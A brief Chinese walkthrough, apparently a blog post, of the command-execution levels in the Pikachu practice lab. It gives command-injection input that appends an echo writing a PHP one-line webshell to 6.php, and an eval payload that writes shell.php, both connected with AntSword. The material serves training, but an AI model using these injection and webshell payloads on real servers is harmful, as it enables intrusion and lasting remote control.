Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
苹果醋34 分钟前
数据库索引设计:在 MongoDB 中创建高效索引的策略
java·运维·spring boot·mysql·nginx
XMYX-020 分钟前
Linux 物理机如何区分 SSD 与 HDD ——以 DELL PERC H730 Mini 为例
linux·运维
行思理40 分钟前
linux 安全与防护,全方向讲解
linux·安全·github
深盾安全1 小时前
Flutter框架编译Android程序全攻略:从入门到进阶
安全
房屋安全鉴定检测1 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一1 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
yongui478342 小时前
CentOS系统如何查看当前内存容量
linux·运维·centos
xzq_java2 小时前
CentOS操作系统虚拟机安装以及连接工具下载和远程连接工具远程连接
linux·运维·centos
房屋安全鉴定检测3 小时前
房屋安全鉴定需要什么条件
安全·网络安全
Sweety丶╮7943 小时前
【Ansible】实施 Ansible Playbook知识点
服务器·云原生·ansible